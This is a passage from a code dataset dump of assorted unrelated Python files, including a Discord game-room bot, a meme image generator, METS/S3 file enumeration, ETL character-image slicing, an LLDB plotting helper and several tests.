list(self._cls.registry().keys())\n\n def classes(self):\n \"\"\"Returns all the classes in the regsitry\"\"\"\n return self._cls.registry()\n\n def get_class(self, type):\n return self._cls.registry()[type]\n\n def values(self):\n \"\"\"Returns all the created objects\"\"\"\n return self._objects.values()\n\n def reload(self, force = False):\n \"\"\"Reloads the registry\"\"\"\n\n # TODO: Deteremine exactly how to reload. This seems to work sometimes\n # depending on the current state. Probably need to invalidate the\n # system cash to ensure everything gets reloaded\n self.import_registry(self._package)\n\n def create(self, name, config = {}, id = None, *args):\n \"\"\"Loads and creates a object from the registry by name\"\"\"\n\n if name not in self._cls.registry():\n raise AttributeError((\"Couldn't find '{}' in the {} registry\").format(\n name, self._cls.__name__.lower()))\n if id is None:\n id = self._object_id\n self._object_id = self._object_id + 1\n if id in self._objects:\n raise AttributeError((\"Object with id '{}' already created\").format(id))\n\n # Create the new object based on the registry entires and \n # validate the schema.\n _cls = self._cls.registry().get(name)\n if config is not None:\n config = _cls.schema()(config)\n obj = _cls(config, *args)\n else:\n obj = _cls(*args)\n\n # Attach some common properties\n setattr(obj, '_id', id)\n setattr(obj, '_type', name)\n\n # Store the object into the internal list and return it\n self._objects[id] = obj\n return obj\n\n def destroy(self, id):\n\n if id not in self._objects:\n raise AttributeError((\"Object with id '{}' does not exist.\").format(id))\n del self._objects[id]\n\n def get(self, id):\n return self._objects.get(id)","sub_path":"ledfxcontroller/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9527452","text":"from typing import List, Tuple\nimport scipy.stats\nimport numpy as np\n\n\ndef calculate_rank_sum_test(alternate_dist: List[int], reference_dist: List[int]) -> Tuple[float, float]:\n stat, pvalue = scipy.stats.ranksums(x=alternate_dist, y=reference_dist)\n return round(stat, 3), round(pvalue, 5)\n\n\ndef get_rank_sum_tests(distributions: dict, variant):\n stats = []\n pvalues = []\n for alt in variant.ALT:\n stat, pvalue = calculate_rank_sum_test(\n alternate_dist=distributions.get(alt, []),\n reference_dist=distributions.get(variant.REF, []))\n if not np.isnan(stat) and not np.isnan(pvalue):\n stats.append(str(stat))\n pvalues.append(str(pvalue))\n return pvalues, stats\n\n\n","sub_path":"vafator/rank_sum_test.py","file_name":"rank_sum_test.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563316984","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport sys\n\n\ndef except_handler(except_type, value, except_traceback):\n if hasattr(sys, 'ps1') or not sys.stderr.isatty():\n # we are in interactive mode or we don't have a tty-like\n # device, so we call the default hook\n sys.__excepthook__(except_type, value, except_traceback)\n else:\n import ipdb\n import traceback\n print(\"Uncaught exception:\", except_type, value)\n traceback.print_exc()\n ipdb.post_mortem(except_traceback)\n\n\nif __name__ == '__main__':\n try:\n sys.excepthook = except_handler\n print(subprocess.check_output(sys.argv[1:]).decode(\"utf-8\"))\n except BaseException:\n except_handler(*sys.exc_info())\n","sub_path":"common/code/snippets/py/post_mortem.py","file_name":"post_mortem.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"251929825","text":"import re\n\nmylist = ['a1.txt','a12.txt','a123.txt','a1234.txt']\n\n# 'a'와 '.txt' 사이에 숫자가 최소 3개이상인 항목들\n# dot(.)은 모든 문자를 의미 / [.]는 '.'문자를 의미하다.\nregex = '^a\\d{3,}[.]txt$'\npattern = re.compile(regex)\n\nfor item in mylist:\n if pattern.match(item):\n print(item,' 적합')\n else:\n print(item,' 부적합')","sub_path":"expression/regex01.py","file_name":"regex01.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"197262278","text":"from PySide import QtCore, QtGui\nimport sys\n\n\nclass SampleWindow(QtGui.QWidget):\n def __init__(self):\n super(SampleWindow, self).__init__()\n\n self.setWindowTitle(\"QSizePolicy\")\n self.resize(300, 150)\n label = QtGui.QLabel(\"Тек��т надписи\")\n label2 = QtGui.QLabel(\"Текст надписи\")\n\n policy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum,\n QtGui.QSizePolicy.Minimum)\n label.setFrameStyle(QtGui.QFrame.Box | QtGui.QFrame.Plain)\n label.setSizePolicy(policy)\n\n vbox = QtGui.QVBoxLayout()\n vbox.addWidget(label)\n vbox.addWidget(label2)\n self.setLayout(vbox)\n","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/003_Placing several components in the box/005_Class_QSizePolicy/089_Minimum2 - toClass.py","file_name":"089_Minimum2 - toClass.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"535325298","text":"#!/usr/bin/env python2\nimport synotil.ptn as sptn\nimport os,sys\nassert len(sys.argv)>1,'not enough arguments'\nIN=sys.argv[1]\nsp = IN.split('/')\nres = [ x for x in sp if sptn.get_runID(x) is not None]\nlenLst = (map(len, res));\nminIdx = min( range(len(lenLst)),key=lenLst.__getitem__)\nprint (res[minIdx])\n#print (sptn.get_runID(IN))\n","sub_path":"synoBio/getRunID.py","file_name":"getRunID.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"298486195","text":"from PIL import Image, ImageDraw, ImageFont\nimport textwrap\nimport sys\n\n\ndef check(files):\n \"\"\"\n files : List of files\n\n For now, the program can only accept the following formats:\n .jpg, .jpeg, .png, .bmp\n\n Returns True of the file format belongs the above mentioned list.\n \"\"\"\n for file in files:\n try:\n Image.open(file)\n except FileNotFoundError:\n Image.open('files/noFiles.png').show()\n exit()\n\n file_format = file.split('.')[-1]\n if file_format not in ['jpg','jpeg','png','bmp']:\n Image.open('files/drake.png').show()\n print (\"Try again with supported file formats recommended by Drake\")\n exit()\n\n return True\n\ndef arrangeTwoImages(topImage, bottomImage):\n \"\"\"\n Arranges two images vertically\n \"\"\"\n firstImage = Image.open(topImage)\n firstImageWidth = firstImage.size[0]\n firstImageHeight = firstImage.size[1]\n\n secondImage = Image.open(bottomImage)\n secondImageWidth = secondImage.size[0]\n secondImageHeight = secondImage.size[1]\n\n newLayoutWidth = max(firstImageWidth, secondImageWidth)\n newLayoutHeight = firstImageHeight+secondImageHeight\n newLayout = Image.new('RGBA',(newLayoutWidth,newLayoutHeight),'white')\n newLayout.paste(firstImage,(0,0))\n newLayout.paste(secondImage,(0,firstImageHeight))\n newImage = newLayout.crop((0,0,firstImageWidth,newLayoutHeight))\n\n return newImage\n\ndef drawMeme(template):\n \"\"\"\n template : the image template\n\n Returns an image object of the finished meme\n \"\"\"\n meme = template\n meme_width, meme_height = template.size\n\n #Load Font\n font = ImageFont.truetype(font = './files/impact.ttf',size = int(meme_height/10))\n\n #Text\n top_text = input('Top text for your meme: ')\n bottom_text = input('Bottom text for your meme: ')\n\n # getting the width and height from 'font'\n char_width, char_height = font.getsize('A')\n\n # set limit for the number of characters per line\n char_per_line = meme_width // char_width\n\n top_text = textwrap.wrap(top_text.upper(), width = char_per_line)\n bottom_text = textwrap.wrap(bottom_text.upper(), width = char_per_line)\n\n draw = ImageDraw.Draw(meme)\n\n y = 10 #y-axis postion for the top text\n for line in top_text:\n line_width, line_height = font.getsize(line)\n x = (meme_width - line_width)/2\n draw.text((x, y), line, fill = 'white', font = font)\n y += line_height\n\n y = meme_height - char_height * len(bottom_text) - 15 # y-axis position for bottom text\n for line in bottom_text:\n line_width, line_height = font.getsize(line)\n x = (meme_width - line_width)/2\n draw.text((x, y), line, fill = 'white', font = font)\n y += line_height\n\n meme_name = input('Any name for your new meme? ')\n if len(meme_name) > 0:\n meme.save(f'{meme_name}.png')\n else:\n meme.save('FreshlyBrewedMeme.png')\n\n meme.show()\n\n\nif __name__ == \"__main__\":\n files = sys.argv[1:] #Loading the images\n\n if len(files) == 0:\n Image.open('files/empty.jpg').show()\n\n elif len(files) == 1:\n if check(files):\n template = Image.open(files[0])\n drawMeme(template)\n\n elif len(files) == 2:\n if check(files):\n template = arrangeTwoImages(files[0],files[1])\n drawMeme(template)\n else:\n Image.open('files/twoImagesOnly.png').show()\n","sub_path":"Final Project/CreateMeme.py","file_name":"CreateMeme.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"572022421","text":"import configparser\r\nfrom api import API\r\nimport discord\r\nfrom discord.ext import commands\r\nimport random\r\nimport datetime\r\n\r\n\r\ndef getRoom(id):\r\n for room in rooms:\r\n if room.id == int(id):\r\n return room\r\n return -1 \r\n\r\ndef getNewNumber(ids, min, max):\r\n id = random.randint(min,max)\r\n while id in ids:\r\n id = random.randint(min,max)\r\n return id\r\n\r\n\r\nclass Player:\r\n def __init__(self, user):\r\n self.user = user\r\n self.champion = 0\r\n self.reroll_count = 2\r\n\r\nclass Room:\r\n def __init__(self):\r\n self.id = getNewNumber([room.id for room in rooms], 1000, 10000)\r\n self.players = [[],[]]\r\n self.player_count = 0\r\n self.champions = []\r\n\r\n def join(self, player, team):\r\n if player.user.id in [p.user.id for t in self.players for p in t]:\r\n player.champion = [p.champion for t in self.players for p in t if p.user.id == player.user.id][0]\r\n self.players = [[p for p in t if p.user.id != player.user.id] for t in self.players] \r\n self.player_count -= 1\r\n \r\n else:\r\n champ = getNewNumber(self.champions, 0, len(api.champions))\r\n player.champion = champ\r\n self.champions.append(champ)\r\n\r\n self.players[team].append(player)\r\n self.player_count += 1\r\n\r\n\r\nbot = commands.Bot(command_prefix='$', description=\"Almog's Leauge Bot\", help_command=None)\r\nrooms = []\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('We have logged in as {0.user}'.format(bot))\r\n\r\n@bot.command()\r\nasync def create(ctx):\r\n room_ = Room()\r\n rooms.append(room_) \r\n\r\n await ctx.send(f\"room created, id: {room_.id}\")\r\n await ShowRoom(ctx, room_.id)\r\n\r\n\r\n@bot.command()\r\nasync def help(ctx):\r\n embed = discord.Embed(title=f\"Help - Commands\", description=\"---------------\", timestamp=datetime.datetime.utcnow(), color=discord.Color.blue())\r\n \r\n embed.add_field(name=\"$create\",value=f\"create a room\", inline=False)\r\n embed.add_field(name=\"$join \",value=\"join room and team\", inline=False)\r\n embed.add_field(name=\"$room \",value=f\"shows the teams and the champions in a room\", inline=False)\r\n\r\n await ctx.send(embed=embed)\r\n \r\n@bot.command()\r\nasync def join(ctx, room_id, team):\r\n room_ = getRoom(room_id)\r\n if room_ != -1:\r\n player = Player(user=ctx.message.author)\r\n if room_.player_count == 10:\r\n await ctx.send(f\"Room {room_id} is full\")\r\n else:\r\n if int(team)>2 or int(team)<1:\r\n await ctx.send(\"Team number out of range\")\r\n else:\r\n room_.join(player=player, team=int(team)-1)\r\n await ctx.send(f\"{player.user.mention} joined room {room_id}\")\r\n await ShowRoom(ctx, room_id)\r\n else:\r\n await ctx.send(f\"Room {room_id} does not exist\")\r\n\r\n\r\n@bot.command()\r\nasync def ShowRoom(ctx, room_id):\r\n room = getRoom(room_id)\r\n if room != -1:\r\n embed = discord.Embed(title=f\"Room {room_id}\", description=\"---------------\", timestamp=datetime.datetime.utcnow(), color=discord.Color.blue())\r\n \r\n data = \"none\" if len(room.players[0]) == 0 else '\\n'.join([f\"{player.user.mention}-{api.champions[player.champion]}-{player.reroll_count}\" for player in room.players[0]])\r\n embed.add_field(name=\"Team 1\",value=f\"{data}\\n\", inline=True)\r\n \r\n data = \"none\" if len(room.players[1]) == 0 else '\\n'.join([f\"{player.user.mention}-{api.champions[player.champion]}-{player.reroll_count}\" for player in room.players[1]])\r\n embed.add_field(name=\"Team 2\",value=f\"{data}\\n\", inline=True)\r\n \r\n await ctx.send(embed=embed)\r\n \r\n else:\r\n await ctx.send(f\"Room {room_id} does not exist\")\r\n\r\n\r\n@bot.command()\r\nasync def reroll(ctx):\r\n if ctx.message.author.id in [player.user.id for r in rooms for team in r.players for player in team]:\r\n for r in rooms:\r\n for team in r.players:\r\n for player in team:\r\n if player.user.id == ctx.message.author.id and player.reroll_count > 0:\r\n champ = getNewNumber(r.champions, 0, len(api.champions))\r\n r.champions.remove(player.champion)\r\n \r\n player.champion = champ\r\n r.champions.append(champ)\r\n player.reroll_count -= 1\r\n\r\n await ShowRoom(ctx, r.id)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n config = configparser.ConfigParser()\r\n config.read('config.ini')\r\n\r\n api = API(config['League of Legends API']['token'])\r\n bot.run(config['Discord']['token'])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"381229145","text":"\"\"\"Version information.\"\"\"\nimport tomlkit\nimport os\nfrom pathlib import Path\n\ndef _get_project_meta():\n try:\n toml_path = Path(__file__).parent.parent.joinpath('pyproject.toml')\n with open(toml_path) as pyproject:\n file_contents = pyproject.read()\n\n return tomlkit.parse(file_contents)['tool']['poetry']\n except:\n return \"version_not_found\"\n \n\npkg_meta = _get_project_meta()\n\n# We use the version from pyproject.toml\n__version__ = str(pkg_meta['version'])\n","sub_path":"tibanna_ffcommon/_version.py","file_name":"_version.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"301572877","text":"import os\nimport re\nimport settings\nfrom s3_keys import get_matching_s3_keys\n\n# Unlike the DDS implementation of this, only get b numbers that are correctly arranged\n# in their 4-level file structure\n\n# provide \"/\" to enumerate all, or be more selective and pass \"/5/5...\" etc.\n\nvalid_dir_names = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"x\"]\n\n\ndef b_numbers_from_fileshare(start_at):\n b_number_pattern = re.compile(r\"\\A(b[0-9ax]{8}).xml\\Z\")\n mets_root = os.path.join(settings.METS_FILESYSTEM_ROOT, start_at)\n for dirpath, _, filenames in os.walk(mets_root, topdown=True):\n this_dir = os.path.dirname(dirpath)\n if os.path.basename(this_dir) in valid_dir_names:\n for f in filenames:\n m = b_number_pattern.match(f)\n if m:\n yield m.group(1)\n\n\ndef b_numbers_from_s3(filter=\"\"):\n # We don't just want to enumerate all the keys in the bucket, as the majority of\n # keys will be for ALTO files (one per image), with multiple manifestations as well.\n\n # options:\n # 1: Issue a prefix query for each level 4 directory, from mets/0/0/0/0 to mets/x/9/9/9\n # - this will yield a lot of missing keys, involves 11000 queries\n # 2: make a prefix query for mets/ and just keep iterating. Can we skip ahead when we find ALTO?\n # underlying AWS API query has page size of 1000, so will involve 20,000 queries to S3 if we do that\n # 3. use the /nets_only prefix. This \"folder\" omits the ALTO files, so will only contain\n # METS for b numbers and multiple manifestations. Although we don't need the MMs, they will only make\n # up a third or so of the total keys, and we can skip them.\n\n # 3 seems most efficient\n prefix = settings.METS_ONLY_ROOT_PREFIX\n b_number_pattern = re.compile(r\"\\A\" + prefix + r\"[0-9ax/]*/(b[0-9ax]{8}).xml\\Z\")\n for key in get_matching_s3_keys(\n bucket=settings.METS_BUCKET_NAME, prefix=prefix + filter\n ):\n m = b_number_pattern.match(key)\n if m:\n yield m.group(1)\n","sub_path":"archive/bagger/src/mets_filesource.py","file_name":"mets_filesource.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"537077882","text":"'''Data-reader for basketball data\n'''\nfrom __future__ import print_function\n\nimport datetime, itertools, os, sys, math, traceback\nimport numpy as np\nimport struct\nfrom os.path import join as pjoin\n\nroot_prefix = \"/Users/stephanzheng/projects/rl/bball/ball_prediction/data\"\n\ndata_dir = os.path.join(root_prefix, \"bin\")\noutput_dir = os.path.join(root_prefix, \"out\")\n\nnum_seconds = 8\nframes_per_second = 25\nnum_players = 10\nnum_balls = 1\nnum_bytes_per_index = 1\nnum_indices_per_frame = 2\n\nfilename = \"00001.bin\"\n\nwith open(pjoin(data_dir, filename), \"rb\") as infile:\n bytes = infile.read()\n filesize = len(bytes)\n print(\"file has\", filesize, \"bytes\")\n\nassert filesize % num_bytes_per_index == 0\nnum_indices = filesize / num_bytes_per_index\n\nindices = np.zeros(num_indices, dtype=np.uint8)\n\nwith open(pjoin(data_dir, filename), \"rb\") as infile:\n for idx in xrange(num_indices):\n bytes = infile.read(num_bytes_per_index)\n if not bytes:\n break\n indices[idx] = ord(bytes)\n\nindices = indices.reshape(num_seconds * frames_per_second, num_players + num_balls, num_indices_per_frame)\n\nfor t in xrange(10):\n print(\"time\", 10*t, \"indices\", indices[10*t])\n","sub_path":"data/data_reader_test.py","file_name":"data_reader_test.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"99664300","text":"import numpy as np\nimport cv2 as cv\nimport csv\nimport os\n\ncsv_file_location = \"data/csv/\"\npng_file_location = \"data/png/\"\n\ncsv_file_1 = \"ETL7LC_01.csv\"\npng_files_1 = [\"ETL7LC_1_00.png\", \"ETL7LC_1_01.png\", \"ETL7LC_1_02.png\", \"ETL7LC_1_03.png\", \"ETL7LC_1_04.png\"]\ncsv_file_2 = \"ETL7LC_02.csv\"\npng_files_2 = [\"ETL7LC_2_00.png\", \"ETL7LC_2_01.png\", \"ETL7LC_2_02.png\", \"ETL7LC_2_03.png\"]\n\ncsv_file_3 = \"ETL7SC_01.csv\"\npng_files_3 = [\"ETL7SC_1_00.png\", \"ETL7SC_1_01.png\", \"ETL7SC_1_02.png\", \"ETL7SC_1_03.png\", \"ETL7SC_1_04.png\"]\ncsv_file_4 = \"ETL7SC_02.csv\"\npng_files_4 = [\"ETL7SC_2_00.png\", \"ETL7SC_2_01.png\", \"ETL7SC_2_02.png\", \"ETL7SC_2_03.png\"]\n\ncharacter_entries = []\n\nentry_index = 0\n\noutput_directory = \"SlicedData\"\npng_folder = os.path.join(output_directory, \"png\")\ngt_file = os.path.join(output_directory, \"gt.txt\")\n\ndef extractImages(csv_file, png_files, disable_thresholding):\n character_entries.clear()\n print(\"opening \", csv_file)\n target_csv_file = csv_file_location + csv_file\n with open(target_csv_file, newline='') as read_file:\n reader = csv.DictReader(read_file)\n for row in reader:\n character_entries.append(row['Character Code'].strip())\n \n if not os.path.exists(png_folder):\n os.mkdir(output_directory)\n os.mkdir(png_folder)\n\n png_index = 1\n global entry_index\n x = 0\n y = 0\n\n img = cv.imread(png_file_location + png_files[0])\n \n kernel = np.ones((2,2), np.uint8)\n with open(gt_file, \"a\") as file:\n for entry in character_entries:\n new_png_name = str(entry_index)+\"_\"+entry+\".png\"\n new_png_path = os.path.join(png_folder, new_png_name)\n \n sub_png_img = img[y:y+63, x:x+64]\n if not disable_thresholding:\n ret, sub_png_img = cv.threshold(sub_png_img, 150, 255, cv.THRESH_BINARY)\n\n sub_png_img = cv.cvtColor(sub_png_img, cv.COLOR_BGR2GRAY)\n dilation = cv.dilate(sub_png_img, kernel, iterations=1)\n \n # cv.imshow(\"sample\", dilation)\n # cv.waitKey()\n # cv.destroyAllWindows()\n\n cv.imwrite(new_png_path, dilation)\n file.writelines(new_png_path + \"\\t\" + entry + \"\\n\")\n entry_index = entry_index + 1\n x = x + 64\n if x == 3200:\n x = 0\n y = y + 63\n if y >= 2520:\n y = 0\n img = cv.imread(png_file_location + png_files[png_index])\n png_index = png_index + 1\n\n\n# New implementation keeps more details of the image. \n# uing normal threshold removes a lot of \"smoothness\"\n# However, this function is incredibly slow! It is possible\n# to add multi threading to this function.\ndef newExtractImages(csv_file, png_files):\n character_entries.clear()\n print(\"opening \", csv_file)\n target_csv_file = csv_file_location + csv_file\n with open(target_csv_file, newline='') as read_file:\n reader = csv.DictReader(read_file)\n for row in reader:\n character_entries.append(row['Character Code'].strip())\n \n if not os.path.exists(png_folder):\n os.mkdir(output_directory)\n os.mkdir(png_folder)\n\n png_index = 1\n global entry_index\n x = 0\n y = 0\n\n img = cv.imread(png_file_location + png_files[0])\n kernel = np.ones((2,2), np.uint8)\n with open(gt_file, \"a\") as file:\n for entry in character_entries:\n new_png_name = str(entry_index)+\"_\"+entry+\".png\"\n new_png_path = os.path.join(png_folder, new_png_name)\n \n sub_png_img = img[y:y+63, x:x+64]\n #sub_png_img = cv.cvtColor(sub_png_img, cv.COLOR_BGR2GRAY)\n #\n #denoised_img = cv.fastNlMeansDenoising(sub_png_img, None, h=40)\n #adapt_thresh = cv.adaptiveThreshold(denoised_img, 255,\n # cv.ADAPTIVE_THRESH_GAUSSIAN_C,\n # cv.THRESH_BINARY, 23, -2)\n #dilation_adapt_thresh = cv.dilate(adapt_thresh, kernel, iterations=1)\n \n #ret, hard_thresh = cv.threshold(sub_png_img, 150, 255, cv.THRESH_BINARY)\n #dilation_hard_thresh = cv.dilate(hard_thresh, kernel, iterations=1)\n\n #cv.imshow(\"Base image\", sub_png_img)\n ##cv.imshow(\"Denoised Image\", denoised_img)\n #cv.imshow(\"adapt_thresh\", adapt_thresh)\n #cv.imshow(\"dilation_adapt_thresh\", dilation_adapt_thresh)\n #\n #cv.imshow(\"hard_thresh\", hard_thresh)\n #cv.imshow(\"dilation_hard_thresh\", dilation_hard_thresh)e\n #cv.waitKey()\n #cv.destroyAllWindows()\n\n #cv.imwrite(new_png_path, dilation_adapt_thresh)\n cv.imwrite(new_png_path, sub_png_img)\n \n file.writelines(new_png_path + \"\\t\" + entry + \"\\n\")\n entry_index = entry_index + 1\n x = x + 64\n if x == 3200:\n x = 0\n y = y + 63\n if y >= 2520:\n y = 0\n img = cv.imread(png_file_location + png_files[png_index])\n png_index = png_index + 1 \n\nif __name__ == \"__main__\":\n newExtractImages(csv_file_1, png_files_1)\n newExtractImages(csv_file_2, png_files_2)\n newExtractImages(csv_file_3, png_files_3)\n newExtractImages(csv_file_4, png_files_4)\n\n disable_thresholding = False\n\n # extractImages(csv_file_1, png_files_1, disable_thresholding)\n # extractImages(csv_file_2, png_files_2, disable_thresholding)\n # extractImages(csv_file_3, png_files_3, disable_thresholding)\n # extractImages(csv_file_4, png_files_4, disable_thresholding)\n ","sub_path":"ETL_Extraction.py","file_name":"ETL_Extraction.py","file_ext":"py","file_size_in_byte":5717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"601257189","text":"#!/usr/bin/python3\n\n# Copyright (c) 2020, Intel Corporation\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of Intel Corporation nor the names of its contributors\n# may be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n# generate split perf json files from a single perf json files\n# mapfile still needs to be updated separately\nfrom __future__ import print_function\nimport os\nimport itertools\nimport json\nimport argparse\nimport sys\nimport perfjson\n\nsys.path.append(os.path.dirname(sys.argv[0]))\n\nap = argparse.ArgumentParser()\nap.add_argument('jsonfile', type=argparse.FileType('r'), help=\"Input json file\")\nap.add_argument('--outdir', default='.')\nap.add_argument('--unit', default='')\nargs = ap.parse_args()\n\noname = perfjson.gen_oname(args.jsonfile.name).replace(\".json\", \"\").split(\"_\")[0]\njf = json.load(args.jsonfile)\nperfjson.cleanjf(jf)\njf = perfjson.del_dup_events(jf)\njf = map(perfjson.fix_names, jf)\njf = perfjson.del_special_events(jf)\n\nif args.unit:\n jf = perfjson.add_unit(jf, args.unit)\n\njf = sorted(jf, key=lambda x: x[\"Topic\"])\n\nfor topic, nit in itertools.groupby(jf, lambda x: x[\"Topic\"]):\n def del_topic(n):\n del n[\"Topic\"]\n return n\n def do_strip(n):\n for k in n.keys():\n if n[k] is None:\n del n[k]\n continue\n n[k] = n[k].strip()\n if n[k] == \"0x00\":\n del n[k]\n return n\n\n j2 = list(nit)\n j2 = map(del_topic, j2)\n j2 = map(do_strip, j2)\n if not j2:\n continue\n topic = topic.replace(\" \", \"-\")\n fn = topic.lower() + \".json\"\n print(fn)\n ofile = open(\"%s/%s\" % (args.outdir, fn), \"w\")\n json.dump(list(j2), ofile, sort_keys=True, indent=4, separators=(',', ': '))\n ofile.close()\n","sub_path":"json-to-perf-json.py","file_name":"json-to-perf-json.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"69034383","text":"import io\nimport lldb\nimport debugger\nimport base64\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef show():\n image_bytes = io.BytesIO()\n plt.savefig(image_bytes, format='png', bbox_inches='tight')\n document = '' % base64.b64encode(image_bytes.getvalue())\n debugger.display_html('debugger:/plot', title='Pretty Plot', position=2, content={'debugger:/plot': document})\n\ndef plot():\n x = np.linspace(0, 2 * np.pi, 500)\n y1 = np.sin(x)\n y2 = np.sin(3 * x)\n fig, ax = plt.subplots()\n ax.fill(x, y1, 'b', x, y2, 'r', alpha=0.3)\n show()\n\ndef plot_image(cmap='nipy_spectral_r'):\n xdim = lldb.frame.EvaluateExpression('xdim').GetValueAsSigned()\n ydim = lldb.frame.EvaluateExpression('ydim').GetValueAsSigned()\n image = lldb.frame.EvaluateExpression('image')\n data = image.GetData()\n data = data.ReadRawData(lldb.SBError(), 0, data.GetByteSize())\n data = np.frombuffer(data, dtype=np.int32).reshape((ydim,xdim))\n plt.imshow(data, cmap=cmap, interpolation='nearest')\n show()\n","sub_path":"extension/tests/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457282967","text":"# coding: utf8\n\nimport pytest\nfrom app.core import stations as st\nfrom app.core.train import Train\n\n\nUNIQUE_ID = '123456789-0'\nCHAT_ID = 123456789\nLOCALE = 'en'\n\n\n@pytest.fixture()\ndef train():\n return Train(\n unique_id=UNIQUE_ID,\n chat_id=CHAT_ID,\n destination='test',\n storage={'FOO': 'foo'}\n )\n\n\n@pytest.mark.unit\nclass TestBaseStation:\n async def test__stopover(self, train, monkeypatch):\n async def _stopover(*_):\n raise KeyError()\n\n monkeypatch.setattr(\n st.BaseStation, '_stopover', _stopover)\n\n await st.BaseStation.stopover(train)\n assert train.has_fail is True\n\n async def test__logger_error(self, train, monkeypatch):\n async def _stopover(*_):\n raise KeyError()\n\n monkeypatch.setattr(\n st.BaseStation, '_stopover', _stopover)\n\n logger_error_msg = [False]\n\n def logger_error_hdl(*_, **__):\n logger_error_msg[0] = True\n\n monkeypatch.setattr(\n st.logger, 'error', logger_error_hdl)\n\n await st.BaseStation.stopover(train)\n\n assert train.has_fail is True\n assert logger_error_msg[0] is True\n\n async def test__sub_stopover(self, train):\n with pytest.raises(NotImplementedError):\n await st.BaseStation.stopover(train)\n\n\n@pytest.mark.unit\nclass TestUISystemException:\n async def test__sub_stopover(self, train, monkeypatch):\n answer = 'foo'\n monkeypatch.setattr(\n st.ui.SystemException, 'generate',\n lambda _, tr: tr.answers.append(answer)\n )\n train.storage['user_info'] = {\n 'unique_id': UNIQUE_ID,\n 'chat_id': CHAT_ID,\n 'locale': LOCALE\n }\n await st.UISystemExceptionSt.stopover(train)\n\n assert len(train.answers) == 1\n assert train.answers[-1] == answer\n","sub_path":"tests/core/test__stations.py","file_name":"test__stations.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"498768283","text":"import os\nimport unittest\n\nfrom Products.Five import zcml\nfrom Products.Five import fiveconfigure\nfrom Products.Five import testbrowser\nfrom Products.PloneTestCase import PloneTestCase as ptc\nfrom Products.PloneTestCase.layer import PloneSite\nptc.setupPloneSite(products=['collective.blog.feeds'])\n\nimport collective.blog.feeds\n\nclass TestCase(ptc.PloneTestCase):\n class layer(PloneSite):\n @classmethod\n def setUp(cls):\n fiveconfigure.debug_mode = True\n zcml.load_config('configure.zcml',\n collective.blog.feeds)\n fiveconfigure.debug_mode = False\n\n @classmethod\n def tearDown(cls):\n pass\n \nclass FunctionalTestCase(ptc.FunctionalTestCase, TestCase):\n \n def test_feeds(self):\n # Use a browser to log into the portal:\n admin = testbrowser.Browser()\n admin.handleErrors = False\n portal_url = 